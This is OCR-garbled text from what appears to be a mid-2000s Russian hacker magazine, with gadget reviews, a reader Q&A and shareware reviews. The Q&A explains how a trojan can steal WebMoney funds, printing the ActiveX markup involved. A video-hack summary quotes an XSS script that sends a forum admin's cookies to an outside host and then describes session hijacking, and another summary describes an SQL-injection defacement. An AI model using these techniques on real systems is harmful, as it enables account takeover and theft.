собственные таланты следующему 
поколению да и, вообще, просто успеть 
больше остальных, тебе понадобится 
хорошо ориентироваться в окружающем 
пространстве и уметь не запутаться в 
переплетениях улиц. Если ты научишься 
это делать, то учти: объезжать пробки по 
закоулкам, где годами никто не убирал 
навечно припаркованные 412-е «Моск- 
вичи», — удовольствие сродни археоло- 
гическим исследованиям. К сожалению, 
даже Джонни-Мнемонику придется туго, 
если он попробует запомнить подроб- 
ные карты городов хотя бы Балашихин- 
ского района, не говоря уже о Мехико- 
Сити, куда ты можешь запросто махнуть 
на поиски приключений. Здесь особенно 
пригодится (ЗРЗ-навигатор, отслежи- 
вающий твое положение с помощью 
спутникового сигнала. Согласны, чувс- 
твовать себя персонажем фильма «Враг 
государства» не слишком приятно, но 
ведь в случае с ОРЗ-навигацией можно 
сказать, что не спутник следит за тобой, 
а ты за ним. Так что все предубеждения 
можно смело отбросить, тем более 
что АЗІІЗ А636 способен серьезно 
облегчить процесс. Этот неслабый 
наладонник с (ЗРЗ-модулем умеет 
еще много, помимо того, чтобы водить 
тебя маршрутами имени Уилла Смита. 
Слова Іпіеі ХЗсаІе РХА270, контроллер 
ѴѴі-Рі, ІгЭА и Віиеіооіф чип ЗіРР Зіаг III и 
поворотная антенна много скажут зна- 
токам. Главное, они означают, что АЗІІЗ 
А636 быстр, как охотник за пустыми 
бутылками, имеет больше связей, чем 
Абрамович, и держит сигнал бульдожьей 
хваткой. Ему вполне по силам отслежи- 
вать раз в секунду твое положение на 
скорости движения кортежа по Рублевке 
с точностью до 5 м. Ну, а если кто-то, 
обладая столь важной информацией, не 
сможет проложить безопасного маршру- 
та, то помочь ему, видимо, сможет только 
доктор Майоров. 
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ЗОМѴ РІ_АѴ- 

ЗТАТІОЫ 

РОРТАВЬЕ 

Одна из главных опасностей, поджидаю- 
щих тебя в процессе ежедневной рутины, 
— всепоглощающая скука. Очереди во 
всевозможных приемных, бесконечные 
пробки, переезды с одного конца города 
на другой и так далее, не говоря уже о 
нудных сдвоенных лекциях. Надежным 
средством борьбы с этой страшной 
напастью может стать Золу Ріаузіайоп 
РогіаЫе — дальний и лучший потомок 
кошмарных тетрисов и прочих геймбоев. 
Машинка размером с сотовый телефон 
образца 1996 года поражает вообра- 
жение ярким дисплеем диагональю в 
4,3 дюйма, занимающим большую часть 
корпуса. Здесь-то уж точно не приходится 
вглядываться в нагромождения пиксе- 
лей, пытаясь заставить воображение 
нарисовать грудастую принцессу с пла- 
неты динозавра Йоши. За изображение 
отвечает мощный ЗО-акселератор, так 
что игры выглядят не хуже, а то и лучше, 
чем на серьезных домашних консолях, 
не говоря уже о предыдущем поколении 
портативных игрушек. Игры для РЗР запи- 
сываются надиски ІІМО, внешним видом 
подозрительно напоминающие практи- 
чески почивший в бозе формат МіпЮізс. 
Видимо, Золу нашла способ поставить 
простаивающее оборудование на рельсы 
конверсии. Помимо игр, о которых тебе 
расскажут другие, не менее любимые 
журналы, РЗР позволяет слушать музыку, 
смотреть видео, графику и текст. Это зна- 
чит, что способов разобраться со скукой, 
плавно переходящей в смертельную зе- 
воту, с появлением у тебя консоли станет 
как минимум пять. В ближайшем будущем 
японцы обещают снабдить свое детище 
полноценным веб-браузером, что в тан- 
деме со встроенным контроллером ѴѴі-Рі 
должно сослужить тебе неплохую службу 
в поиске, обнаружении и использовании 
«незапертых» беспроводных сетей. 

Если отвлечься от ѴѴіреоиІ: Риге и вспом- 
нить о личной безопасности, то утеши- 
тельных результатов РЗР не принесет. У 
консоли крайне высокий уровень при- 
влекательности в глазах всевозможных 
деклассированных элементов, поэтому 
пользоваться ею в последней электричке 
горьковского направления лучше не сто- 
ит. Как бы то ни было, в крайнем случае 
при весе в 300 г и с металлической задней 
крышкой РЗР может выступить в роли 
«не слишком тяжелого тупого предмета» 
для нанесения телесных повреждений в 
ожидании подхода наряда милиции. 



ТЕСН[\ІІС5 

РР-ОН1200 



АРРІ.ЕІРСѲ 

ѴЮЕО6О0 




Чуткий слух, конечно, крайне важен 
для нормальной жизнедеятельности, 
но на городских улицах и под землей на 
первый план выходит острое зрение. 
Надеемся, о поддержании его надлежа- 
щей остроты ты позаботился и успешно 
справляешься с мелким шрифтом на 
страницах любимого журнала. Значит 
в том, чтобы усладить собственный 
слух хорошей музыкой в процессе 
монотонных путешествий по городу 
на метро, электричках, маршрутках, а 
то и своих двоих, нет ничего плохого. 
Правда, в качестве средства услаж- 
дения порекомендовать тебе истошно 
орущие «затычки», часто прилагаемые 
в довесок к вполне достойным плеерам, 
мы никак не можем. Для вдумчивого 
получения удовольствия от музыки, а 
также качественного ограждения твоей, 
без сомнения, высокоорганизованной 
личности от негативного влияния шума 
и пустых речей окружающих потребу- 
ется что-то посерьезней. Например, 
наушники ТесИпісз ВР-ЭН1200. Надев их 
себе на голову, ты с радостью заметишь, 
что у скандальной тетки, притиснутой 
к тебе в тесном чреве вагона «Метрос- 
трой» практически пропал голос, а в 
редкой концертной записи «Продиджей» 
в полном объеме проявились подобаю- 
щие басы. Дизайн наушников наводит 
на мысли сразу о трех «Терминаторах», 
так как серебряный цвет используется 
в них самым выдающимся образом. 
Выносливость конструкции, призванной 
ежедневно сносить тяготы эксплуатации 
в условиях агрессивной внешней среды, 
подтверждается неподдельной любовью 
к этой модели диджеев, которых хлебом 
не корми, дай что-нибудь повыкручивать. 
Защитные функции ТесИпісз ВР-ЭН1200 
распространяются в основном на звуко- 
вые вторжения в личное пространство, 
разве что в темном переулке подвы- 
пивший охотник до чужого имущества 
примет тебя в них за инопланетянина. 




Эталонный дизайн этого плеера может 
сослужить плохую службу и привлечь к 
твоей персоне внимание нежелательных 
социальных элементов, однако он слиш- 
ком хорош, чтобы его прятать. іРоб Ѵібео 
вполне по силам обратить на себя внима- 
ние хорошенькой пассажирки напротив, 
которая также, как ты «обожает» обще- 
ственный транспорт. Уверен, вы найдете, 
о чем поговорить. Кроме того, ты всегда 
сможешь показать ей горячий видеоро- 
лик, только что выкачанный из Сети на 
2-дюймовом цветном дисплее или дать 
«порулить» с помощью фирменного ко- 
леса сенсорного управления СІіскѴѴНееІ. 
Шестьдесят (!) гигабайт жесткого диска 
плеера предоставят достаточную широту 
выбора, чтобы найти что-нибудь по душе 
даже для дежурного по станции «Планер- 
ная» Московского метрополитена. Се- 
рьезным доводом в споре с патрульным 
милиционером, возжелавшим проверить 
документы у такого необычного прохоже- 
го, как ты, могут стать 20 МВт выходной 
мощности на канал — все позывные 
служителя закона просто пройдут мимо 
твоих ушей. Учитывая тему нашего эссе, 
в совсем новом свете предстает метал- 
лический корпус плеера и сердечник 
жесткого диска. Видел вестерны, где 
смертельный удар отрицательного героя 
останавливает припрятанная во внутрен- 
ний карман фляжка с любимым виски? 

Не будем спорить, что лучше: виски или 
іРосІ, однако равных в прочности корпуса 
у нового плеера от Арріе найдется немно- 
го. Кроме того, по крылатому выражению 
Бориса из всем известного фильма Гая 
Ричи, «если он не сработает, ты всегда 
сможешь им как следует врезать против- 
нику», если таковой найдется, чего мы, 
конечно, ни в коем случае не желаем. 



Эту статью мы позаимствовали из 

ЯППёПКПКПГП НОМЙПЯ Яѵпг. Оня ням тяк 
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СТЕПАН ИЛЬИН АКА 5ТЕР 

/ ГАО@ПЕАІ_.ХАКЕР.ПІІ / 



Задавая вопрос, подумай! Не стоит мне посылать вопросы, так или 
иначе связанные с хаком/крэком/фриком — для этого есть Наск- 
Іац ( Наскіад@геаІ.хакер.пА не стоит также задавать откровенно 
ламерские вопросы, ответ на которые ты при определенном же- 
лании можешь найти и сам. Я не телепат, поэтому конкретизируй 
вопрос, присылай как можно больше информации 



імации. 
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(^: Беда! Исчезли деньги из с кошелька \ѴеЬтопеу. Пускай сумма 
несущественная, но факт остается фактом. Денег нет. Л не работал 
с этой платежной системой уже несколько недель, но в истории 
платежей указано, что несколько дней назад был осуществлен пе- 
ревод денег на другой кошелек. Как это вообще могло получиться? 
Использую файрвол и антивирус, своевременно устанавливаю все 
обновления для винды. А в настройках \ѴеЬтопеу Кеерег активи- 
рована привязка к ІР. 

А: Если честно, то увести деньги с ѴѴМ -кошелька — не такая уж 
большая проблема. В публичном доступе подходящего инструмен- 
тария, конечно, не найти, но будь уверен, что в приватных закромах 
подобного добра хватает. Подцепить заразу сейчас проще просто- 
го. Серфишь инет и никого не трогаешь, а вместе с тем твоя тачка 
легко может быть заражена через еще неопубликованный баг в 
ІпГегпеі Ехріогег’е. Дальше — дело техники. Зараза может легко за- 
маскироваться и делать в твоей системе все что заблагорассудит- 
ся, втом числе и мухлевать с ѴѴеЬМопеу Кеерег’ом. И не надо делать 
глупости, пытаясь переименовывать или переносить его исполня- 
емый файл. Не поможет! Трояну он даже не понадобится! Вместо 
этого он легко инициализирует его запуск с помощью АсІіѵеХ-эле- 
ментов, открыв в браузере страницу со следующим содержимым: 
«ЭВ^СТ Ю="ѴѴМАссерІог" 

СІ_А38Ю="СІ_8Ю:463Е066Е-431 В-1 1 02-АОВ0-0080С83ОА4ЕВ" 
СООЕВАЗЕ=ИДр://сІоѵѵпІоасІ.ѵѵеЬтопеу.ги/\/ѴМАссерЮг. 

САВ#ѵегзіоп=1 ,0,0,31 

ѴѴЮТН=76 

НЕЮНТ=58> 

<РАНАМ !\ІАМЕ="п5{аІе" ѴАШЕ=2> 

</СШЕСТ> 

После выполнения данного кода пользователю тутже будет выдано 
сообщение с предложением запустить программу для управления 
кошельками. С помощью АРІ-функций троян элементарно может 
скрыть это окно от пользователя и согласится на запуск програм- 
мы. Этот же прием используется для отправки денежных средств 
с кошелька жертвы. В качестве защиты от подобной гадости 
ѴѴеЬтопеу Кеерег предложит ввести трехзначное псевдослучай- 
ное число, отображаемое наэкране. Проблемалишь втом, что лю- 
бая мало-мальски рабочая ОСВ-библиотека легко обрабатывает 
изображение и успешно распознает цифры. 

<^): Говорят, что даже при использовании 80СК8 можно пропа- 
литься из-за ІЭЫ8-сервера. Это правда? 

А: Каждый раз, когда в адресной строке браузера ты набираешь 
ѵѵѵѵѵѵ.хакер.ги . твой компьютер обращается к Эотаіп І\Іате серве- 
ру, чтобы выяснить его ІР-адрес. Если ты хочешь обратиться к ѵѵѵѵѵѵ. 
хакер.ги анонимно, то использовать свой родной провайдерский 
ОІМЗ-сервер будет не самой лучшей идеей. Во-первых, ты банально 
сдашь себя своему провайдеру: любой анализ логов может пока- 
зать, что ты нередко посещаешь, к примеру, хакерские и кардер- 
ские форумы. Во-вторых, ты можешь сдать себя непосредственно 
удаленному серверу. Проведем эксперимент: пропиши в браузере 
анонимную прокси и зайди насайт ѵѵѵѵѵѵ.сІпззШй.сот/ІооІз/аЬоиІѵои. 
об. Если прокся оказалась действительно анонимной, то в графе 
«Ѵоиг ІР» ты увидишь ее адрес. Но это — половинабеды. Опускайся 
до конца страницы и смотри на поле «Ѵоиг ЭІ\ІЗ Зегѵег». Удивился, 
да? То-то и оно, что в большинстве случаев там будет ЭІ\ІЗ твоего 
любимого прова. Попался! 

Решений проблемы может быть несколько. Самый простой вы- 
ход — прописать совершенно левый ЭІЧЗ, находящийся в какой-ни- 
будь Зимбабве. Еще лучше — использовать 50СК35 и в параметрах 
соксофикации активировать опцию «Везоіѵе аІІ патез гетоіеіу». 
Но лучше всего использовать ѴРІ\І. В двух последних случаях вмес- 
то ЭІ\ІЗ будет отображаться адрес сокса или ѴРІ\І. 

<^): Чем отличается хост, хит, посетитель — все они фигурируют 
в статистике сайта? 

А: Хитом считается любой заход на сайт. Если ты зашел на ѵѵѵѵѵѵ. 
хакер.ги 1 0 раз, то все они прибавятся к счетчику хитов. Один хост 
— это уникальный за текущие сутки ІР-адрес. Другими словами, 
количество хостов за день будет равно количеству посетителей 
с уникальными ІР'шниками. В последнее время часто используют 
еще один критерий — посетитель. Это один хост, сделавший более 
одного хита. Таким образом, подсчитывается количество реальных 
посетителей с некоторой активностью на сайте, а не просто случай- 
ных гостей, которые сразу его покинули. 



(^): Объясни, почему в Ѵізиаі 8ШсІіо 2005 нельзя просто вызвать 
функцию АіхМе8«а§еВох( «Сообщение») — приходится разби- 
вать ее на три отдельных оператора: 

С8ігіп§ ЬВиіСІіск; 

ЬВи1:С1іск= " Сообщение " ; 

АіхМе88а§еВох(ЬВи1:С1іск); 

А: Это напрямую связано с использованием в Ѵ32005 другого 
стандарта кодирования символов, а именно — ІІпісосІе. Для того 
чтобы все разом заработало, подставь букву І_ перед кавычками. 
Вызов функции в этом случае будет осуществляться так: АІхМезз 
адеВох(І_"Сообщение"). В юникоде одному символу соответствует 
не один, а два байта. Поэтому необходимо производить подобное 
преобразование. Если ІІпісосІе не нужен, то можно отключить его в 
параметрах проекта ил и использовать директиву #ипбеШІ\ІІССЮЕ. 
Последнюю нужно включить во все файлы проекта. 

<^: А как можно быстро отправить \Уіпсіо\ѵ8 ХР в ребут, не ожидая 
завершения всех сопутствующих процедур (сохранения парамет- 
ров и т.п. ) ? В \Ѵіпск)\\ г 8 9х, скажем, это осуществлялось двукратным 
нажатием Сггі-Аіг-Оеі. 

А: Если нужна экстренная перезагрузка, то просто зажми клавишу 
СігІ и выбери в диспетчере задач команду «Перегрузить» — если 
лень дотянуться до кнопки Везеі. 

(^): Хотим в узких местах нашей домашней сети провести опто- 
волоконные линии. Дены на оптику сейчас невысокие, но вот в 
сварке — загвоздка. Сварочного аппарата, естественно, нет, ком- 
петентных людей — тоже. Что можешь посоветовать в этом слу- 
чае? Неужели нет никакой альтернативы? 

А: Возможность сращивать оптические волокна сваркой действи- 
тельно присутствует далеко не везде и не всегда. Оборудование 
стоит порядка десяти тысяч долларов. Оно периодически ломается, 
требует обслуживания и расходных материалов. При этом для свар- 
ки необходимо четко соблюдать температурные условия работы, а 
также параметры питания от сети. Понятно, что все это не всегда 
выполнимо. В качестве альтернативы был создан другой, более 
простой и дешевый способ сращивания волокон — при помощи 
механических соединителей, так называемых сплайсов. Принцип 
предельно прост: скрепить два световода так, чтобы получился 
один цельный. Для этого в конструкции предусмотрены две специ- 
альные направляющие, а также устройство для их фиксации. Мес- 
то стыка, а иногда все внутреннее пространство сплайса, запол- 
няется специальным гелем. Его показатель преломления близок к 
показателю преломления световода, поэтому он никак не влияет 

Каждый раз, когда в адресной строке 
браузера ты набираешь \у\у\у. хакер. 
га, твой компьютер обращается к 
Эотаіп Кате серверу, чтобы выяс- 
нить его ІР-адрес. 



на передачу света. Возникающее при таком соединении затухание 
практически не отличается от затухания соединения, произведен- 
ного с помощью сварки. Несмотря на небольшую цену сплайса 
(всего $10 — 20), соединение осуществляется быстро и надежно. 
И хотя допускается исключительно одноразовое применение, люди 
научились осуществлять повторную сцепку волокон. 

Процедуру склейки можно условно разделить на несколько про- 
стых пунктов: 
разделка кабелей; 

удаление покрытия волокон, а также гидрофобного заполнителя 
(в случае его наличия, конечно). Последний представляет собой 
специальное вещество, которое моментально восполняет оболоч- 
ку кабеля в месте его повреждения; 

скалывание оптических волокон с помощью специального инс- 
трумента ( цена скалывателя от $1 00); 
контроль скола волокон. Если скалывание осуществлено неудач- 
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ЗкуІпиСігтоСаІПп 

стоят одинаково • $ 
за три месяца или Ф о э 

за год. 



но, то нужно попытаться сделать это повторно; 

монтаж соединяемых волокон в направляющих сплайса 
и их позиционирование; 

фиксация оптических волокон и последующий контроль 
соединения 

(Д: А в чем прикол Х8ЬТ? 

А: Технология Х5І_Т (сокращенно от ЕхІепзіЫе ЗіуІезИееІ: І_апдиаде 
Тгапзіогтаііопз) является одним из важнейших представителей 
ХМІ_-семейства. Документ в ХМІ_-формате представляет собой со- 
вокупность данных, но никак не описывает параметры их представ- 
ления наэкране. Единожды созданный ХМ Ь-файл может быть пред- 
ставлен в совершенно разном виде, при этом визуализация лежит 
на плечах других технологий — в первую очередь на ХЗІ_Т. После 
применения к ХМІ_-документу таблицы стилей, описанной в соот- 
ветствии с правилами Х5І_Т, исходные данные не изменятся. Зато 
создастся новый документ, в который будут записаны результаты 
преобразования. Это необязательно будет текстовый документ или 
файл с ХМІ_-структурой. Он может представлять собой что угод- 
но — все зависит лишь оттех правил, которые заложены в таблице 
Х5І_Т. Чаще всего подобные преобразования осуществляются в 
веб-приложениях для того, чтобы визуализировать данные изХМІ_- 
документа в красивом НТМ1_-виде. Настоятельно рекомендую тебе 
прочитать книгу «ХЗІ_Т в примерах», электронная версия которой, 
вдобавок переведенная на русский язык, располагается по адресу: 
НДр:// 2 ѵоп.ога/ххІ/ХЗЕТи 1 огіаІ/Ои 1 ри 1 гиз/іпсіех.іііт . 

(^: Вы писали, что существует два вида синтаксиса ассемблера. Чем 
они отличаются и какой из них проще? 

А: Действительно, существуют два вида синтаксиса: Іпіеі и АТ&Т. 
Читая статьи из раздела «Кодинг», ты имел дело с ІпІеГовским син- 
таксисом. Он проще и компилится большинством компиляторов 
(МАЗМ, ТАЗМ, РАЗМ, ІЧА5М и другими). Характерные особенности: 
Приемник указывается слева от источника. Команда тоѵ еах, еЬх 
перешлет в еах значение регистра еЬх. 

Существует определенный набор зарегистрированных слов, в 
частности названия регистров. Их нельзя использовать для указа- 
ния переменных и меток. 

С синтаксисом АТ&Т работает ОІМІІ АззетЫег, входящий по умол- 
чанию в любой І_іпих. Однако он довольно специфичен и в какой-то 
мере более сложен: 

Наименование регистра начинается со знака процента (%): %еах, 
%еЬх, %есх, %ебх. 

Иной порядок операндов: в начале указывается источник, затем 
— приемник. В синтаксисе Іпіеі все наоборот. 

Размер операнда определяется как окончание имени инструкции. 
Окончание Ь указывает на то, что операнды имеют размер 1 байт, 
окончание ѵѵ — 1 слово (2 байта), окончание I — 4 байта. Например: 
тоѵі %еЬх,%еах (регистры еЬх и еах оперируютдвойными словами, 
то есть операндами размером 4 байта). 

Константы отмечаются префиксом $, 
например зиЫ $31 337,%еЬх. 

Сегмент и смещение отмечаются по-другому. Сравни: 

00:0РРЬ (Іпіеі) и 00.$0хРР (АТ&Т). 

Справедливости ради замечу, что в целом синтаксисы очень похо- 
жи, и тому, кто разберется с программированием на одном из них, 
перейти на другой не составит труда. Тем более что всегда можно 
воспользоваться специальным конвертером — аП2іпІеІ ( ѵѵѵѵѵѵ.ЫаІі. 
сН/аД2іпіеІ ). 

Вот в РНР есть две функции: ргіпі и есЬо. Обе выводят текст 
на экран (то есть веб-страницу), но должна же быть какая-то раз- 
ница? 

А: В результате интерпретации следующего кода: 

<?рбр 

ргіпГНеІІо ѴѴогІсІ! <Ьг/>"; 
есИо "НеІІо ѴѴогІсМ"; 

?> 

выход на экран будет одинаковым: 

НеІІо ѴѴогІсІ! 

НеІІо ѴѴогІсІ! 

Поэтому чаще всего использование той или иной функции зависит 
отличных предпочтений. Однако разница все-таки есть и напрямую 



связана с тем, как ты используешь вывод. В случае использования 
функции ргіпі возвращается значение Тше или Раізе. Это может 
быть удобно, например, для реализации алгоритмов сортировки. 
В то же время функция ЕсИо не возвращает какого-либо значения, 
но зато выполняется немного быстрее. 

(^: Перестала определяться моя ТТ8В- флешка на 5 12 Мб. Что делать? 

А: Проблемы с определением РІазИ-диска могут возникнуть по 
нескольким причинам. Он может быть не отформатированным, 
ошибочно защищенным от записи/чтения. Возможно, в системной 
области неправильно указан его размер. Во всех этих случаях ре- 
цепт один: нужно попробовать отформатировать его с помощью 
специальной утилиты, которая у каждого производителя РІазИ-уст- 
ройств своя. Беги на его официальный сайт и в разделе Эоѵѵпіоабз 
ищи фирменную программу для форматирования. Если определить 
принадлежность флешки к тому или иному производителю невоз- 
можно, то нужно попытаться выяснить используемый тип контрол- 
лера. Для этого можно выложить фото девайса (если возможно — 
в разобранном виде) на различных «железных» форумах, где 
опытные люди смогут тебе подсказать. В некоторых случаях может 
помочь программа ЕгВесоѵег ( ИДрѴ/тіке.зкѵрег.ги/ііІез/ЕгВесоѵег. 
ехе). Не хочу тебя расстраивать, но сбой подобного плана, скорее 
всего, повлечет за собой полную потерю данных с устройства. 
В следующий раз делай бэкап. 

(^: Бизнес требует организовать входящие и исходящие звонки за 
пределами нашей любимой Родины. Судя по отзывам, мне идеаль- 
но подходят два сервиса: 8куре ( \ѵ\ѵ\ѵ . 8 кур е . со т ) и бігто (\ѵ\ѵ\ѵ. 
у, і 7 т о р го) с сГ . со т ) . Но что лучше? 

А: Сразу говорю: по функциональности различий нет. Правда, 
достигается она различными средствами. Для передачи голоса 
Зкуре использует свой собственный протокол, специально раз- 
работанный и оптимизированный. Ребята выпустили реально за- 
конченный продукт, который будет неприхотливо работать в любых 
условиях — лишь бы был доступ в Сеть. Никакие ІМАТ’ы, серые ІР 
и распространенные пользовательские ограничения на качество 
разговора и возможность соединения не повлияют. Быстро наби- 
рающий популярность (ЗІ 2 ІПО использует в корне другой подход и 
основывается на протоколе ЗІР (Зеззіоп ІпШаІіоп Ргоіосоі). В статье 
«Прощай, телефонная сеть» («Хакер», январь) описываются до- 
стоинства и недостатки этого протокола. В частности, к недостат- 
кам можно отнести некоторые проблемы клиентов, работающих 
через ІЧІАТ (а таких сегодня очень и очень много). С другой сторо- 
ны, системы, построенные на открытых протоколах, всегда более 
расширяемые, поэтому клиент (Зігто отлично взаимодействует с 
другими программами, основанными наЗІР(кпримеру, Ореп ѴѴепдо 
— ѵѵѵѵѵѵ.орепѵѵепао.сот Т Обе системы предоставляют бесплатные 
звонки с компьютера на компьютер, возможность совершать звон- 
ки на обычный и мобильный телефоны (Зку Оиі и (Зішпо СаІІ Оиі). 
Стоимость звонка в обоих случаях зависит от месторасположения 
абонента: наиболее популярные направления (в том числе Москва 
и Питер) через Зкуре стоят порядка 2-х центов в минуту. У Оігто 
расценки сильно варьируются: при цене в 1 цент/минута на звонки 
в Штаты ты будешь звонить в Россию за 32 цента/минута (по-моему, 
чрезмерно много). Возможность аренды настоящего номера и при- 
ема звонков через компьютер (Зку Іп и (Зішю СаІІ Іп) стоят одинако- 
во: $1 2 за три месяца или $35 за год. Что касается Зкур’а, то можно 
арендовать до 1 0-ти номеров в десятки стран. Сігто предоставляет 
другие условия: неограниченное количество номеров, но только в 
США и Великобританию. Теперь по качеству соединения. Тут, ко- 
нечно, главное — качество канала. Если с качеством проблем нет, 
то едва ли разговор по обычному телефону и ѴоІР будет различим. 
В случае загруженного канала могут появиться заикания, а также 
некоторые задержки в разговоре. Но даже в этих условиях вполне 
сносно можно общаться на уровне сотовой связи. 

ВІЫАПѴѴОІШ’ЗЗС 
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ПРОГРАММИРОВАНИЮ, ИНТЕРНЕТУ И СОВРЕМЕННЫМ СРЕДСТВАМ 
Связи. ТЮНИНГУ, МОДИНГУ И ОВЕРКДОКИНГу 
АДМИНИСТРИРОВАНИЮ И НАСТРОЙКЕ ОС И СЕТЕЙ. Е СОММЕРСЕ 



И КАРЬЕРЕ В ІТ ХОЧЕШЬ ЗНАТЬ БОЛЬШЕ? ЧИТАН ХАКЕР СПЕЦ 1 
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ОБХОДИМ ЗАЩИТУ РЗС 2.0 



Однажды в студеную зимнюю пору одному 
перцу пришла в голову мысль покопаться в 
чужой проге дебаггером. Но вот незадача: 
вместо нормального кода, он увидел там ка- 
кую- то ерунду. Возможно, он выкинул бы эту 
идею из головы, если не... Впрочем, оставим 
интимные подробности — просто он решил 
довести дело до конца. Окно анализатора 
РЕЮ с потрохами выдало используемую в 
приложении защиту: ею оказался Р80 2.0. 
Вооружившись кучкой знаний и впихнув себе 
в башню немного серого вещества, наш при- 
ятель приступил к работе. Дабы избавиться 
от лишнего геморроя, он запаковал станда- 
ртный виндовый блокнот тем же РЗѲ’ом. Отк- 
рыв запакованный файл в дебаггере ОІІуЮсІд, 
он для начала решил найти переход на ОЕР 
(переход оказался непростым, а тройным) и, 
как не странно, ему это удалось. Сняв отпе- 
чаток памяти своего компьютера, он с удив- 
лением обнаружил, что он мертвый. Тут мер- 
завец решил заставить жить неработающий 
экзэшник. Прочитав дополнительную лите- 
ратуру (в виде анекдотов), он попытался вос- 
станавливать таблицу импортов в дампе. Для 
этого с помощью шестнадцатеричного ре- 
дактора он вскрыл дамп и нашел там изуро- 
дованные РЗО’ом табы. Прикрутив новую 
чистенькую таблицу к своему дампу, его 
удивлению не было предела. 

Дамп работает. И работает на ура! 



БЕДНЫЙ-БЕДНЫЙ ІВР 



ЭВ этом видео-взломе, хакер демонстрирует 
новую уязвимость в популярном форумном 
движке Іпѵізіоп Роѵѵег ВоагсІ. Вначале он за- 
действует Яндекс для целенаправленного по- 
иска русского хостинга с установленным ІРВ. 
Герой делает следующий запрос: «Форум 
Іпѵізіоп Роѵѵег ВоагсІ Платный хостинг от .ш». 
Вторая ссылка, выданная поисковиком, приве- 
ла его на форум компании ѴіаИозР Взломщик 
был предусмотрительным и заранее зарегист- 
рировался на форуме. Далее он выбирает слу- 
чайное сообщение 

и жмет на кнопку «Жалобы». Чтобы не вызвать 
подозрений у администрации, герой пишет 
правдоподобное сообщение и попутно встав- 
ляет іаѵа-скрипт, передающий админские ку- 
кисы на сторонний сервер. Сам воровской 
скрипт выглядит примерно так: <зсгірЫтд = 
пеѵѵ Ітаде(); ітд.згс = 

'Мр://апІісІпа1.огд/з/тузпіІРдіІ?Чбоситеп1.соо 

кіе;</зсгірЬ>. 

Через какое-то время, негодяй просматривает 
логи снифера и обнаруживает там идентифи- 
катор, сессию и хэш пароля администратора 
похаканной борды. Теперь дело за малым - ос- 
талось лишь подменить свои кукисы админс- 
кими. Для этих целей взломщик использует 
плагин для браузера МогіІІа — Соокіе Есіііог. 
Обновив страницу, герой понимает, что теперь 
он является админом с ником Зиррогі :). Но 
ему и этого мало, поэтому он пытается рас- 



шифровать хэш для входа в админку. Брут по 
нескольким словарям не увенчался успехом. 
Хостингу повезло и в этот раз он отделался 
легким испугом. Если бы хакер завладел паро- 
лем (в админцентр без пропуска нельзя ;), то 
далее можно залить веб-шелл, а потом и пору- 
лить всей машиной. 

ДЕФЕЙС ѴѴѴѴѴѴ.ХАКЕР.РШ 

I АВТОР: 2 АС О 



Ты, наверное, уже наслышан о кратковремен- 
ном дефейсе ѵѵѵѵѵѵ.хакер.ги? Мы не могли оста- 
вить этот случай без внимания и поэтому в ка- 
честве бонуса ты найдешь на диске полноцен- 
ный видео-хак нашего сайта. Я не буду рас- 
сказывать тебе всю суть ролика, лишь в крат- 
ких чертах опишу его содержание. Сначала 
багоискатель заходит на сайт и обращает вни- 
мание на скрипт для добавления мнения 
к статье/новости. На протяжении всего видео 
этот скрипт подвергается разнообразным и 
ужасным пытками со стороны взломщика. 
Чувак попался не из робкого десятка и просто 
так сдаваться не желал. В конце концов, пос- 
ле длительных потуг он таки подбирает коли- 
чество полей для совершения инжекции и да- 
же названия некоторых из них. Этих метадан- 
ных достаточно, для того чтобы, например, пе- 
реименовать новость на сайте, изменить ее 
описание или просто задефейсить хакерский 
мегапортал :). 

ВШАКѴ ѴСШП’5 Т 
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ЗНАПЕѴѴАВЕ2 



Оезкіоорз 1 .0.3.0 Вѳіа 

ѴѴіпсІоѵѵз ХР 
Ргееѵѵаге 
5І2ѳ: 1445 Кб 

ѵѵѵѵѵѵ.хііокіі.согп/сіезкіоорз 




В один прекрасный день, возможно, даже без принятия цветной 
морфеувской пилюли, поменяется твое видение мира... К сожа- 
лению, родная винда не станет менять свой вид подстать новому 
настроению, какой бы новый десктоп ты не поставил. Здесь же 
предлагается радикальное решение: ты можешь прокручивать 
все открытые окна, как киноленту, перемещаясь по горизонтали. 
Нажав знакомый АІІ+ТаЬ, сможешь лицезреть запущенные про- 
ги в сферическом виде. К сожалению, прога порой косячит при 
одновременной работе на двух мониторах. Да и прокрутка экрана 
между играми вводитсофт в ступор. Если тебя прелыщаетулучшен- 
ная работа со множеством окон одновременно, но при этом без 
запущенного панорамного обозрения, то на помощь может прийти 
шароварный аналог — ТорРезк( ѵѵѵѵѵѵ.о1:акизоІ1ѵѵаге.сот/1:орбезк Ѵ 
Оставив сантименты духовных перемен в стороне, по-настоящему 
решение будет востребовано лишь юзерами экранов небольшого 
размера и ограниченного разрешения. 



Весоіогеб 1 .0.1 

ѴѴіпсІоѵѵз 95/98/2000/ХР 
ЗИагеѵѵаге 
Зіге: 5594 Кб 
ѵѵѵѵѵѵ.гесоіогеб.сот 

Хакеры живут своей богатой жизнью, которая зачастую мало 
пересекается с окружающим миром. Однако даже у этих героев 
есть родня, которую не удивишь подарком базы СО или поднятием 
шелл-сервера на ожидаемый ДР. Хороший подарок, на мой взгляд, 
— переделанные фотографии из семейного альбома. Несмотря на 
то, что старые черно-белые фотки несут в себе столько памяти, они 
уже поблекли, потрескались, и лица родственников едва ли можно 




разглядеть, но с помощью Ресоіогеб ты легко справишься с этими 
проблемами. Софтина не очень известна в народе, но уже была 
успешно сопровождена лекарством от жадности. Если использо- 
вание подобного не прельщает, то можно попробовать бесплатный 
аналог РаіпШЕТ ( ѵѵѵѵѵѵ.еесз.ѵѵзи.еби/раіпЦпеІ: ). 



ЗепГгуЗ.О Веіа 1 

ѴѴіпсІоѵѵз 95/98/2000/ХР 

ЗНагеѵѵаге 

Зіге: 1015 Кб 

ѵѵѵѵѵѵ.ІгезИзоІІѵѵаге.сот/зепІгу/зепІгуЗ 
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По сути, любой компьютеризированный процесс можно сделать 
лучше: более удобным и затюненным . Зепігу отвечает за очень тон- 
кую настройку блокировки компа; теперь даже простая операция 
окажется стильной. Отныне ты можешь оставить мессагу подо- 
шедшему к компу, вроде «Руки прочь, не лапать! Ушел на базу!». 
Любознательные же смогут оставить тебе сообщение и при «ни- 
фиганеделании» изучить полную подборку твоих скринсейверов. 
Заставки могут быть и предельно информативными: содержать 
данные о времени восхода и заката или выводить на экран скрытую 
камеру изженской сауны;). Приятной фишкой станет возможность 
переноса проги на любой комп посредством ІІЗВ-брелка. Вставив 
его, ты даже без инсталляции сможешь лочить чужую машину со 
всеми полагающимися фишками. 



СаІІЗоЙѴоІРВеІаІ.О 

